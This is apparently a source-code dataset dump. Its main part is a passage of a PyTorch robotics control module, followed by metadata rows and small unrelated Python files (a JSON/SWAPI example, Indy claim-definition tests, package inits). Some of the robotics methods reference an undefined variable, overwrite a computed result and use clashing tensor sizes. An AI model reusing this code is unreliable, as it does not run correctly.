self.p_dx = tdist.MultivariateNormal(mu, self.var) # self.var->torch.size(6, 6)
def log_prob(self, action):
'''
Target Energy is a energy function that will provide the desired velocity given the current state p(\dot{x} | x)
We will model it with a gaussian distribution
'''
# TODO:
action = action[:, :self.dim] # torch.Size([1000, 6])
return self.p_dx.log_prob(action) # torch.Size([1000])
class JointGoToLeaf(EnergyLeaf):
def __init__(self, dim=7, Kp = 1., Kv = 1.,
q_des=torch.tensor([2.0, 0.1, 2.0, 1.0, 0.2, -1.0, 0.3]),
# ([2.215, 0.088, 2.156, 1.060, 0.238, -1.023, 0.373]),
dq_des=torch.tensor([0., 0., 0., 0., 0., 0., 0.]),
var=torch.eye(7).float() * 100.):
super(JointGoToLeaf, self).__init__()
self.dim = dim
self.Kp = Kp
#self.register_buffer('Kp', Kp)
self.Kv = Kv
#self.register_buffer('Kv', Kv)
self.q_des = q_des
#self.register_buffer('q_des', q_des)
self.dq_des = dq_des
#self.register_buffer('dq_des', dq_des)
self.var = var
# TODO: 07.10 -> Low variance for joints related with the elbow and big variance for the rest of thew joints
self.var[2][2] = 10.
self.var[3][3] = 10.
## Multivariate Gaussian distribution ##
self.p_dx = None
def set_context(self, state):
'''
We compute the conditioning variables of our model to have a faster optimization
'''
q = state[0] # Tensor(7, 1), joint position values
dq = state[1] # Tensor (7, 1), joint speed values
###########################################
ddq = self.Kp * (self.q_des - q) + self.Kv * (self.dq_des - dq)
self.p_dx = tdist.MultivariateNormal(ddq, self.var) # self.var->torch.size(7, 7)
def log_prob(self, action):
'''
Target Energy is a energy function that will provide the desired velocity given the current state p(\dot{x} | x)
We will model it with a gaussian distribution
'''
# TODO:
action = action[:, :self.dim] # torch.Size([1000, 7])
return self.p_dx.log_prob(action) # torch.Size([1000])
class JointGoToLeaf_lefthand_and_base(EnergyLeaf):
def __init__(self, dim=10, Kp = 1., Kv = 1.,
q_des=torch.tensor([1.2, 1.0, 0., 2.0, 0.1, 2.0, 1.0, 0.2, -1.0, 0.3]),
# ([2.215, 0.088, 2.156, 1.060, 0.238, -1.023, 0.373]),
dq_des=torch.tensor([0., 0., 0., 0., 0., 0., 0., 0., 0., 0.]),
var=torch.eye(10).float() * 100.):
super(JointGoToLeaf_lefthand_and_base, self).__init__()
self.dim = dim
self.Kp = Kp
#self.register_buffer('Kp', Kp)
self.Kv = Kv
#self.register_buffer('Kv', Kv)
self.q_des = q_des
#self.register_buffer('q_des', q_des)
self.dq_des = dq_des
#self.register_buffer('dq_des', dq_des)
self.var = var
# TODO: 07.10 -> Low variance for joints related with the elbow and big variance for the rest of thew joints
self.var[0][0] = 10.
self.var[0][0] = 10.
# self.var[2][2] = 10.
# self.var[3][3] = 10.
## Multivariate Gaussian distribution ##
self.p_dx = None
def set_context(self, state):
'''
We compute the conditioning variables of our model to have a faster optimization
'''
q = state[0] # Tensor(7, 1), joint position values
dq = state[1] # Tensor (7, 1), joint speed values
###########################################
ddq = self.Kp * (self.q_des - q) + self.Kv * (self.dq_des - dq)
self.p_dx = tdist.MultivariateNormal(ddq, self.var) # self.var->torch.size(7, 7)
def log_prob(self, action):
'''
Target Energy is a energy function that will provide the desired velocity given the current state p(\dot{x} | x)
We will model it with a gaussian distribution
'''
# TODO:
action = action[:, :self.dim] # torch.Size([1000, 7])
return self.p_dx.log_prob(action) # torch.Size([1000])
class PathPlanLeaf_lefthand_and_base(EnergyLeaf):
def __init__(self, dim=2, Kp = 1., Kv = 1., var=torch.eye(2).float() * 5.):
super(PathPlanLeaf_lefthand_and_base, self).__init__()
self.dim = dim
self.Kp = Kp
#self.register_buffer('Kp', Kp)
self.Kv = Kv
#self.register_buffer('Kv', Kv)
self.var = var
## Multivariate Gaussian distribution ##
self.p_dx = None
def set_context(self, state):
'''
We compute the conditioning variables of our model to have a faster optimization
'''
#print("state: ", state)
xy = state[0] # torch.Size([2]), x and y
xy_t = torch2numpy(xy).tolist()
v = state[1] # torch.Size([2]), dx, dy
v_t = torch2numpy(v).tolist()
#print("v_t: ", v_t)
# TODO: NEED to set a multivariable gaussian distribution of dx. | added on 08.13, 08.17
###########################################
ddx = cascade_control_dx.cascade_control_get_dx(xy_t, v_t) # TODO: Return n ddx from x points | 09.02
ddx_t = torch.tensor(ddx)
self.p_dx = tdist.MultivariateNormal(ddx_t, self.var)
def log_prob(self, action):
'''
Target Energy is a energy function that will provide the desired velocity given the current state p(\dot{x} | x)
We will model it with a gaussian distribution
'''
# TODO:
action = action[:, :self.dim] # torch.Size([1000, 2])
return self.p_dx.log_prob(action) # torch.Size([1000])
class PathPlanLeaf_lefthand_and_base_np(EnergyLeaf):
def __init__(self, dim=2, Kp = 1., Kv = 1., var=torch.eye(2).float() * 1.):
super(PathPlanLeaf_lefthand_and_base_np, self).__init__()
self.dim = dim
self.Kp = Kp
#self.register_buffer('Kp', Kp)
self.Kv = Kv
#self.register_buffer('Kv', Kv)
self.var = var
## Multivariate Gaussian distribution ##
self.p_dx = []
def set_context(self, state):
'''
We compute the conditioning variables of our model to have a faster optimization
'''
xy = state[0] # torch.Size([2]), x and y
xy_t = np.around(torch2numpy(xy), 3).tolist()
v = state[1] # torch.Size([2]), dx, dy
v_t = np.around(torch2numpy(v), 3).tolist()
# TODO: NEED to set a multivariable gaussian distribution of dx. | added on 08.13, 08.17
###########################################
ddx = cascade_control_dx.cascade_control_get_n_ddx(xy_t, v_t, num=2) # TODO: Return n ddx from x points | 09.02
ddx_t = torch.tensor(ddx)
# The N multivariate gaussian distribution
for i in range(num):
cur_gaussian = tdist.MultivariateNormal(ddx_t[i], self.var)
self.p_dx.append(cur_gaussian)
def log_prob(self, action):
'''
Target Energy is a energy function that will provide the desired velocity given the current state p(\dot{x} | x)
We will model it with a gaussian distribution
'''
# TODO:
action = action[:, :self.dim] # torch.Size([1000, 2])
# The summation of n multivariate gaussian distribution
num = 2
g = []
for i in range(num):
g.append(torch.unsqueeze(self.p_dx[i].log_prob(action), dim=1))
result = torch.logsumexp(torch.stack(g, dim=2), dim=2).reshape(1000, )
#result = self.p_dx[0].log_prob(action)
# g0 = torch.unsqueeze(self.p_dx[0].log_prob(action), dim=1)
# g1 = torch.unsqueeze(self.p_dx[1].log_prob(action), dim=1)
# g2 = torch.unsqueeze(self.p_dx[2].log_prob(action), dim=1)
# result = torch.logsumexp(torch.stack([g0, g1, g2], dim=2), dim=2).reshape(1000, )
return result
class PathPlanLeaf_pos(EnergyLeaf_x): # TODO: heatmap of position | add 09.13
def __init__(self, dim=2, Kp = 1., Kv = 1., var=torch.eye(2).float() * 1.):
super(PathPlanLeaf_pos, self).__init__()
self.dim = dim
self.Kp = Kp
#self.register_buffer('Kp', Kp)
self.Kv = Kv
#self.register_buffer('Kv', Kv)
self.var = var
## Multivariate Gaussian distribution ##
self.p_dx = None
self.closest_point = None
def set_context(self, state):
'''
We compute the conditioning variables of our model to have a faster optimization
'''
xy = state[0] # torch.Size([2]), x and y
xy_t = torch2numpy(xy).tolist()
v = state[1] # torch.Size([2]), dx, dy
v_t = torch2numpy(v).tolist()
# ddx = cascade_control_dx.cascade_control_get_dx(xy_t, v_t)
# ddx_t = torch.tensor(ddx)
pos = cascade_control_dx.cascade_control_get_x(xy_t, v_t) # TODO: Return 1 closest point
pos_t = torch.tensor(pos)
self.closest_point = pos
closest_points.append(pos)
self.p_dx = tdist.MultivariateNormal(pos_t, self.var) # TODO: Define a gaussian distribution
def log_prob(self, action, state):
"""
Target Energy is a energy function that will provide the desired velocity given the current state p(\dot{x} | x)
We will model it with a gaussian distribution
"""
# TODO: add euler discretization | 09.13
action = action[:, :self.dim] # torch.Size([1000, 2])
q_t = state[0] # torch.Size([2]), x and y
dq_t = state[1] # torch.Size([2]), dx, dy
##########################################
ddq_t = action
dq_t = dq_t + ddq_t * 1./240.
q_t = q_t + dq_t * 1./240.
# TODO: add heatmap | 09.13
global path
global CREATE_DIR
if not CREATE_DIR:
path = self.create_dir()
CREATE_DIR = True
global count
if count % 1500 == 1:
grid_map = self.gen_gridmap()
log_map = torch.exp(self.p_dx.log_prob(grid_map))
fig = self.gen_heatmap(log_map=log_map, closest_point=self.closest_point, current_point=state[0])
self.save_heatmap(fig, path)
count += 1
##########################################
return self.p_dx.log_prob(q_t) # torch.Size([1000])
def gen_gridmap(self):
"""
Return a grid map with tensorsize([nc*nr, 2]) for heatmap generation
"""
dx, dy = -0.01, 0.01
# generate 2 2d grids for the x & y bounds
y, x = np.mgrid[1.78:-0.78 + dx:dx, -0.78:1.78 + dy:dy]
ic(x)
ic(y)
nr = len(x)
nc = len(y)
grid_map = []
cur_grid = [0, 0]
for i in range(nr):
for j in range(nc):
cur_grid[0] = x[i][j]
cur_grid[1] = y[i][j]
grid_map.append(cur_grid)
cur_grid = [0, 0]
grid_map = torch.tensor(grid_map)
return grid_map
def gen_heatmap(self, log_map, closest_point, current_point):
"""
log_map: torch.tensorsize([nc* nr, 2])
"""
fig, ax = plt.subplots(1, 1) # TODO: Initialize fig
dx, dy = -0.01, 0.01
# generate 2 2d grids for the x & y bounds
y, x = np.mgrid[1.78:-0.78 + dx:dx, -0.78:1.78 + dy:dy]
nr = len(x)
nc = len(y)
log_map = log_map.reshape((nr, nc))
log_max, log_min = log_map.max(), log_map.min()
# Mark the goal point
goal_circle = plt.Circle((1.2, 1.0), 0.01, color='r', fill=True)
ax.text(1.2, 1.0, s='goal', fontsize=8.)
ax.add_patch(goal_circle)
# Mark the current point
current_circle = plt.Circle((current_point[0], current_point[1]), 0.01, color='y', fill=True)
ax.text(current_point[0], current_point[1], s='current', fontsize=8.)
ax.add_patch(current_circle)
# Mark the closest point
closest_circle = plt.Circle((closest_point[0], closest_point[1]), 0.01, color='g', fill=True)
ax.text(closest_point[0], closest_point[1], s='closest', fontsize=8.)
ax.add_patch(closest_circle)
# Mark the arrow
delta_x, delta_y = closest_point[0]-current_point[0], closest_point[1]-current_point[1]
delta = math.sqrt(pow(delta_x, 2)+pow(delta_y, 2))
ax.arrow(current_point[0], current_point[1], dx=delta_x/delta * 0.08, dy=delta_y/delta * 0.08, width=0.001, head_width=0.025, color='y')
c = ax.pcolor(x, y, log_map, cmap='RdBu', vmin=log_min, vmax=log_max)
ax.set_title('Closest point heatmap')
fig.colorbar(c, ax=ax)
fig.tight_layout()
plt.show()
return fig
def create_dir(self):
t = time.strftime("%Y-%m-%d-%H_%M_%S", time.localtime())
base_dir = os.path.abspath(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))
heatmap_dir = os.path.join(base_dir, "Results_figure/heatmap/")
path = os.path.join(heatmap_dir, t)
os.mkdir(path)
return path
def save_heatmap(self, fig, path):
t = time.strftime("%Y-%m-%d-%H_%M_%S", time.localtime())
fig.savefig(path+'/heatmap_{}.png'.format(t), dpi=300)
class PathPlanLeaf_n_pos(EnergyLeaf_x): # TODO: heatmap of position | add 09.15
def __init__(self, dim=2, Kp=1., Kv=1., var=torch.eye(2).float() * 1.):
super(PathPlanLeaf_n_pos, self).__init__()
self.dim = dim
self.Kp = Kp
# self.register_buffer('Kp', Kp)
self.Kv = Kv
# self.register_buffer('Kv', Kv)
self.var = var
## Multivariate Gaussian distribution ##
self.p_dx = []
self.closest_point = None
def set_context(self, state):
'''
We compute the conditioning variables of our model to have a faster optimization
'''
xy = state[0] # torch.Size([2]), x and y
xy_t = torch2numpy(xy).tolist()
v = state[1] # torch.Size([2]), dx, dy
v_t = torch2numpy(v).tolist()
# ddx = cascade_control_dx.cascade_control_get_dx(xy_t, v_t)
# ddx_t = torch.tensor(ddx)
pos_n = cascade_control_dx.cascade_control_get_n_x(xy_t, v_t, num=2) # TODO: Return N closest points
pos_t = torch.tensor(pos_n)
self.closest_point = pos_n
closest_points.append(pos_n)
# N closest points ===>>> N gaussian distributions
for i in range(len(pos_n)):
cur_gaussian = tdist.MultivariateNormal(pos_t[i], self.var)
self.p_dx.append(cur_gaussian)
def log_prob(self, action, state):
"""
Target Energy is a energy function that will provide the desired velocity given the current state p(\dot{x} | x)
We will model it with a gaussian distribution
"""
# TODO: add euler discretization | 09.13
action = action[:, :self.dim] # torch.Size([1000, 2])
q_t = state[0] # torch.Size([2]), x and y
dq_t = state[1] # torch.Size([2]), dx, dy
##########################################
ddq_t = action
dq_t = dq_t + ddq_t * 1. / 240.
q_t = q_t + dq_t * 1. / 240.
# TODO: add heatmap | 09.13
global path
global CREATE_DIR
if not CREATE_DIR:
path = self.create_dir()
CREATE_DIR = True
global count
gg = []
if count % 2000 == 1:
print("self.closest_point: ", self.closest_point)
for i in range(num):
grid_map = self.gen_gridmap()
gg.append(torch.unsqueeze(self.p_dx[i].log_prob(grid_map), dim=1))
log_map = torch.exp(torch.logsumexp(torch.stack(gg, dim=2), dim=2)).reshape(len(grid_map),)
fig = self.gen_heatmap(log_map=log_map, closest_point=self.closest_point, current_point=state[0])
self.save_heatmap(fig, path)
count += 1
###########################################
g = []
for i in range(num):
g.append(torch.unsqueeze(self.p_dx[i].log_prob(q_t), dim=1))
result = torch.exp(torch.logsumexp(torch.stack(g, dim=2), dim=2)).reshape(1000, )
return result
def plot_multi_gaussian(self):
pass
def gen_gridmap(self):
"""
Return a grid map with tensorsize([nc*nr, 2]) for heatmap generation
"""
dx, dy = -0.01, 0.01
# generate 2 2d grids for the x & y bounds
y, x = np.mgrid[1.78:-0.78 + dx:dx, -0.78:1.78 + dy:dy]
ic(x)
ic(y)
nr = len(x)
nc = len(y)
grid_map = []
cur_grid = [0, 0]
for i in range(nr):
for j in range(nc):
cur_grid[0] = x[i][j]
cur_grid[1] = y[i][j]
grid_map.append(cur_grid)
cur_grid = [0, 0]
grid_map = torch.tensor(grid_map)
return grid_map
def gen_heatmap(self, log_map, closest_point, current_point):
"""
log_map: torch.tensorsize([nc* nr, 2])
"""
fig, ax = plt.subplots(1, 1) # TODO: Initialize fig
dx, dy = -0.01, 0.01
# generate 2 2d grids for the x & y bounds
y, x = np.mgrid[1.78:-0.78 + dx:dx, -0.78:1.78 + dy:dy]
nr = len(x)
nc = len(y)
log_map = log_map.reshape((nr, nc))
log_max, log_min = log_map.max(), log_map.min()
# Mark the goal point
goal_circle = plt.Circle((1.2, 1.0), 0.01, color='r', fill=True)
ax.text(1.2, 1.0, s='goal', fontsize=8.)
ax.add_patch(goal_circle)
# Mark the current point
current_circle = plt.Circle((current_point[0], current_point[1]), 0.01, color='y', fill=True)
#ax.text(current_point[0], current_point[1], s='cur', fontsize=8.)
ax.add_patch(current_circle)
# Mark the closest point
for i in range(len(self.closest_point)):
closest_circle = plt.Circle((closest_point[i][0], closest_point[i][1]), 0.01, color='g', fill=True)
ax.text(closest_point[i][0], closest_point[i][1], s='closest', fontsize=8.)
ax.add_patch(closest_circle)
# Mark the arrow
for i in range(len(self.closest_point)):
delta_x, delta_y = closest_point[i][0] - current_point[0], closest_point[i][1] - current_point[1]
delta = math.sqrt(pow(delta_x, 2) + pow(delta_y, 2))
ax.arrow(current_point[0], current_point[1], dx=delta_x / delta * 0.06, dy=delta_y / delta * 0.05, width=0.0005,
head_width=0.03, color='y')
c = ax.pcolor(x, y, log_map, cmap='RdBu', vmin=log_min, vmax=log_max)
ax.set_title('Closest point heatmap')
fig.colorbar(c, ax=ax)
fig.tight_layout()
plt.show()
return fig
def create_dir(self):
t = time.strftime("%Y-%m-%d-%H_%M_%S", time.localtime())
base_dir = os.path.abspath(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))
heatmap_dir = os.path.join(base_dir, "Results_figure/heatmap/")
path = os.path.join(heatmap_dir, t)
os.mkdir(path)
return path
def save_heatmap(self, fig, path):
t = time.strftime("%Y-%m-%d-%H_%M_%S", time.localtime())
fig.savefig(path+'/heatmap_{}.png'.format(t), dpi=300)
class PathPlanLeaf_trackfather(EnergyLeaf):
def __init__(self, dim=2, Kp=1., Kv=1., var=torch.eye(2).float() * 0.1):
super(PathPlanLeaf_trackfather, self).__init__()
self.dim = dim
self.Kp = Kp
# self.register_buffer('Kp', Kp)
self.Kv = Kv
# self.register_buffer('Kv', Kv)
self.var = var
## Multivariate Gaussian distribution ##
self.p_dx = None
def set_context(self, state):
'''
We compute the conditioning variables of our model to have a faster optimization
'''
xy = state[0] # torch.Size([2]), x and y
xy_t = torch2numpy(xy).tolist()
v = state[1] # torch.Size([2]), dx, dy
v_t = torch2numpy(v).tolist()
# TODO: NEED to set a multivariable gaussian distribution of dx. | added on 08.13, 08.17
###########################################
ddx = cascade_control_dx.track_father_get_ddx(xy_t, v_t, K=1) # TODO: Return n ddx from x points | 09.02
ddx_t = torch.tensor(ddx)
self.p_dx = tdist.MultivariateNormal(ddx_t, self.var)
def log_prob(self, action):
'''
Target Energy is a energy function that will provide the desired velocity given the current state p(\dot{x} | x)
We will model it with a gaussian distribution
'''
# TODO:
action = action[:, :self.dim] # torch.Size([1000, 2])
return self.p_dx.log_prob(action) # torch.Size([1000])
class PathPlanLeaf_track_Nfather(EnergyLeaf): # TODO: added on 09.23
def __init__(self, K=1, dim=2, Kp = 1., Kv = 1., var=torch.eye(2).float() * .01):
super(PathPlanLeaf_track_Nfather, self).__init__()
self.dim = dim
self.Kp = Kp
#self.register_buffer('Kp', Kp)
self.Kv = Kv
#self.register_buffer('Kv', Kv)
self.var = var
## Multivariate Gaussian distribution ##
self.p_dx = []
self.K = K
self.params = None
def set_context(self, state):
'''
We compute the conditioning variables of our model to have a faster optimization
'''
xy = state[0] # torch.Size([2]), x and y
xy_l = torch2numpy(xy).tolist()
v = state[1] # torch.Size([2]), dx, dy
v_l = torch2numpy(v).tolist()
# TODO: NEED to set a multivariable gaussian distribution of dx. | added on 08.13, 08.17
###########################################
ddx, x_goal_dist = cascade_control_dx.track_father_get_n_ddx(xy_l, v_l, K=self.K) # TODO: Return K ddx from x points | 09.22
ddx_t = torch.tensor(ddx)
#print("ddx_t: ", ddx_t)
max_idx = int(torch.argmax(x_goal_dist))
self.params = [0.] * len(x_goal_dist)
self.params[max_idx] = 1.
# self.params = x_goal_dist
# N closest points ===>>> N gaussian distributions
for i in range(len(ddx_t)):
cur_gaussian = tdist.MultivariateNormal(ddx_t[i], self.var)
self.p_dx.append(cur_gaussian)
def log_prob(self, action):
'''
Target Energy is a energy function that will provide the desired velocity given the current state p(\dot{x} | x)
We will model it with a gaussian distribution
'''
# TODO:
action = action[:, :self.dim] # torch.Size([1000, 2])
g = []
for i in range(num):
g.append(torch.unsqueeze(self.p_dx[i].log_prob(action), dim=1))
result = torch.exp(torch.logsumexp(torch.stack(g, dim=2), dim=2)).reshape(5000, )
result = self.p_dx[0].log_prob(action) * self.params[0] + \
self.p_dx[1].log_prob(action) * self.params[1]
# #self.p_dx[2].log_prob(action) * self.params[2]
return result # torch.Size([1000])
| 32.65
| 144
| 0.562021
| 3,768
| 26,120
| 3.743365
| 0.08413
| 0.012761
| 0.017866
| 0.003119
| 0.85374
| 0.808295
| 0.785892
| 0.771287
| 0.747465
| 0.737256
| 0
| 0.039574
| 0.287979
| 26,120
| 800
| 145
| 32.65
| 0.718841
| 0.282619
| 0
| 0.669136
| 0
| 0
| 0.015208
| 0.00263
| 0
| 0
| 0
| 0.02125
| 0
| 1
| 0.091358
| false
| 0.002469
| 0.032099
| 0
| 0.187654
| 0.004938
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fc3f2efad981ac61a0cf52f912cf9d73000f25c8
| 103
|
py
|
Python
|
pud/interface/__init__.py
|
gwangyi/pud
|
23a5ff8a3592ce640ab04569f4cc9ce38883b47b
|
[
"Apache-2.0"
] | null | null | null |
pud/interface/__init__.py
|
gwangyi/pud
|
23a5ff8a3592ce640ab04569f4cc9ce38883b47b
|
[
"Apache-2.0"
] | null | null | null |
pud/interface/__init__.py
|
gwangyi/pud
|
23a5ff8a3592ce640ab04569f4cc9ce38883b47b
|
[
"Apache-2.0"
] | null | null | null |
from ._common import Device, Command, command
from ._common import load_protocol, available_protocols
| 25.75
| 55
| 0.834951
| 13
| 103
| 6.307692
| 0.692308
| 0.243902
| 0.390244
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116505
| 103
| 3
| 56
| 34.333333
| 0.901099
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
fc8420775b7cf45dce42a4d020b674d07a21528b
| 1,471
|
py
|
Python
|
ClassFiles/Python201/APIs/ReadingJson.py
|
minefarmer/CompletePython
|
6de46e7ee29d9e4eaada60352c193f552afd6f15
|
[
"Unlicense"
] | null | null | null |
ClassFiles/Python201/APIs/ReadingJson.py
|
minefarmer/CompletePython
|
6de46e7ee29d9e4eaada60352c193f552afd6f15
|
[
"Unlicense"
] | null | null | null |
ClassFiles/Python201/APIs/ReadingJson.py
|
minefarmer/CompletePython
|
6de46e7ee29d9e4eaada60352c193f552afd6f15
|
[
"Unlicense"
] | null | null | null |
import json
c3p0 = '''{
"name": "C-3PO",
"height": "167",
"mass": "75",
"hair_color": "n/a",
"skin_color": "gold",
"eye_color": "yellow",
"birth_year": "112BBY",
"gender": "n/a",
"homeworld": "http://swapi.dev/api/planets/1/",
"films": [
"http://swapi.dev/api/films/1/",
"http://swapi.dev/api/films/2/",
"http://swapi.dev/api/films/3/",
"http://swapi.dev/api/films/4/",
"http://swapi.dev/api/films/5/",
"http://swapi.dev/api/films/6/"
],
"species": [
"http://swapi.dev/api/species/2/"
],
"vehicles": [],
"starships": [],
"created": "2014-12-10T15:10:51.357000Z",
"edited": "2014-12-20T21:17:50.309000Z",
"url": "http://swapi.dev/api/people/2/"
}'''
c3p0 = json.loads(c3p0)
# print(c3p0['name']) # C-3PO
# print(type(c3p0)) # <class 'dict'>
c3p0['name'] = "Kane Ezki"
c3p0_str = json.dumps(c3p0)
print(c3p0_str) # {"name": "Kane Ezki", "height": "167", "mass": "75", "hair_color": "n/a", "skin_color": "gold", "eye_color": "yellow", "birth_year": "112BBY", "gender": "n/a", "homeworld": "http://swapi.dev/api/planets/1/", "films": ["http://swapi.dev/api/films/1/", "http://swapi.dev/api/films/2/", "http://swapi.dev/api/films/3/", "http://swapi.dev/api/films/4/", "http://swapi.dev/api/films/5/", "http://swapi.dev/api/films/6/"], "species": ["http://swapi.dev/api/species/2/"], "vehicles": [], "starships": [], "created": "2014-12-10T15:10:51.357000Z", "edited": "2014-12-20T21:17:50.309000Z", "url": "http://swapi.dev/api/people/2/"}
| 40.861111
| 640
| 0.600952
| 223
| 1,471
| 3.919283
| 0.273543
| 0.185355
| 0.24714
| 0.308924
| 0.842105
| 0.842105
| 0.842105
| 0.842105
| 0.842105
| 0.842105
| 0
| 0.100828
| 0.096533
| 1,471
| 35
| 641
| 42.028571
| 0.55681
| 0.46499
| 0
| 0.0625
| 0
| 0
| 0.855314
| 0.076825
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.03125
| 0
| 0.03125
| 0.03125
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
fc977a2539222a6a21621836ed3d71a1ac58df88
| 3,183
|
py
|
Python
|
indy_client/test/cli/test_send_claim_def.py
|
ArtObr/indy-node
|
f3491c42eba1a1b45df98f0e4dabe749d281ae33
|
[
"Apache-2.0"
] | null | null | null |
indy_client/test/cli/test_send_claim_def.py
|
ArtObr/indy-node
|
f3491c42eba1a1b45df98f0e4dabe749d281ae33
|
[
"Apache-2.0"
] | null | null | null |
indy_client/test/cli/test_send_claim_def.py
|
ArtObr/indy-node
|
f3491c42eba1a1b45df98f0e4dabe749d281ae33
|
[
"Apache-2.0"
] | null | null | null |
from indy_client.test.cli.constants import SCHEMA_ADDED, CLAIM_DEF_ADDED
from indy_client.test.cli.helper import getSeqNoFromCliOutput
def test_send_claim_def_succeeds(
be, do, poolNodesStarted, trusteeCli):
be(trusteeCli)
do('send SCHEMA name=Degree version=1.0'
' keys=undergrad,last_name,first_name,birth_date,postgrad,expiry_date',
expect=SCHEMA_ADDED,
within=5)
schemaTxnSeqNo = getSeqNoFromCliOutput(trusteeCli)
do('send CLAIM_DEF ref={ref} signature_type=CL',
expect=CLAIM_DEF_ADDED,
mapper={'ref': schemaTxnSeqNo},
within=239)
def test_send_claim_def_fails_if_ref_is_seqno_of_non_schema_txn(
be, do, poolNodesStarted, trusteeCli):
be(trusteeCli)
do('send SCHEMA name=Degree version=1.1'
' keys=undergrad,last_name,first_name,birth_date,postgrad,expiry_date',
expect=SCHEMA_ADDED,
within=5)
schemaTxnSeqNo = getSeqNoFromCliOutput(trusteeCli)
do('send CLAIM_DEF ref={ref} signature_type=CL',
expect=CLAIM_DEF_ADDED,
mapper={'ref': schemaTxnSeqNo},
within=239)
firstClaimDefSeqNo = getSeqNoFromCliOutput(trusteeCli)
do('send CLAIM_DEF ref={ref} signature_type=CL',
expect='Schema with seqNo {ref} not found',
mapper={'ref': firstClaimDefSeqNo},
within=5)
def test_send_claim_def_fails_if_ref_is_not_existing_seqno(
be, do, poolNodesStarted, trusteeCli):
be(trusteeCli)
do('send SCHEMA name=Degree version=1.2'
' keys=undergrad,last_name,first_name,birth_date,postgrad,expiry_date',
expect=SCHEMA_ADDED, within=5)
schemaTxnSeqNo = getSeqNoFromCliOutput(trusteeCli)
do('send CLAIM_DEF ref={ref} signature_type=CL',
expect='Schema with seqNo {ref} not found',
mapper={'ref': schemaTxnSeqNo + 1},
within=5)
def test_can_not_send_claim_def_for_same_schema_and_signature_type(
be, do, poolNodesStarted, trusteeCli):
be(trusteeCli)
do('send SCHEMA name=Degree version=1.3'
' keys=undergrad,last_name,first_name,birth_date,postgrad,expiry_date',
expect=SCHEMA_ADDED,
within=5)
schemaTxnSeqNo = getSeqNoFromCliOutput(trusteeCli)
do('send CLAIM_DEF ref={ref} signature_type=CL',
expect=CLAIM_DEF_ADDED,
mapper={'ref': schemaTxnSeqNo},
within=239)
do('send CLAIM_DEF ref={ref} signature_type=CL',
expect='can have one and only one CLAIM_DEF',
mapper={'ref': schemaTxnSeqNo},
within=5)
def test_can_send_same_claim_def_by_different_issuers(
be, do, poolNodesStarted, trusteeCli, newStewardCli):
be(trusteeCli)
do('send SCHEMA name=Degree version=1.4'
' keys=undergrad,last_name,first_name,birth_date,postgrad,expiry_date',
expect=SCHEMA_ADDED,
within=5)
schemaTxnSeqNo = getSeqNoFromCliOutput(trusteeCli)
do('send CLAIM_DEF ref={ref} signature_type=CL',
expect=CLAIM_DEF_ADDED,
mapper={'ref': schemaTxnSeqNo},
within=239)
be(newStewardCli)
do('send CLAIM_DEF ref={ref} signature_type=CL',
expect=CLAIM_DEF_ADDED,
mapper={'ref': schemaTxnSeqNo},
within=239)
| 30.902913
| 78
| 0.70311
| 402
| 3,183
| 5.313433
| 0.169154
| 0.074906
| 0.067416
| 0.052434
| 0.82912
| 0.784644
| 0.784644
| 0.784644
| 0.784644
| 0.735955
| 0
| 0.013261
| 0.194471
| 3,183
| 103
| 79
| 30.902913
| 0.819813
| 0
| 0
| 0.746667
| 0
| 0
| 0.306533
| 0.105214
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0.026667
| 0
| 0.093333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5d77a89c22e791f4f5930972be59bcb8c1aca8b4
| 173
|
py
|
Python
|
bbq/archives/__init__.py
|
agaier/bbq
|
ff140f86abca18ed8ba814dc3d4035f86cc18518
|
[
"MIT"
] | null | null | null |
bbq/archives/__init__.py
|
agaier/bbq
|
ff140f86abca18ed8ba814dc3d4035f86cc18518
|
[
"MIT"
] | null | null | null |
bbq/archives/__init__.py
|
agaier/bbq
|
ff140f86abca18ed8ba814dc3d4035f86cc18518
|
[
"MIT"
] | null | null | null |
from bbq.archives.grid_archive import GridArchive
from bbq.archives.grid_archive import GridArchive_Obj
__all__ = [
GridArchive,
GridArchive_Obj,
]
| 21.625
| 53
| 0.722543
| 19
| 173
| 6.157895
| 0.473684
| 0.119658
| 0.25641
| 0.324786
| 0.735043
| 0.735043
| 0.735043
| 0
| 0
| 0
| 0
| 0
| 0.225434
| 173
| 7
| 54
| 24.714286
| 0.873134
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
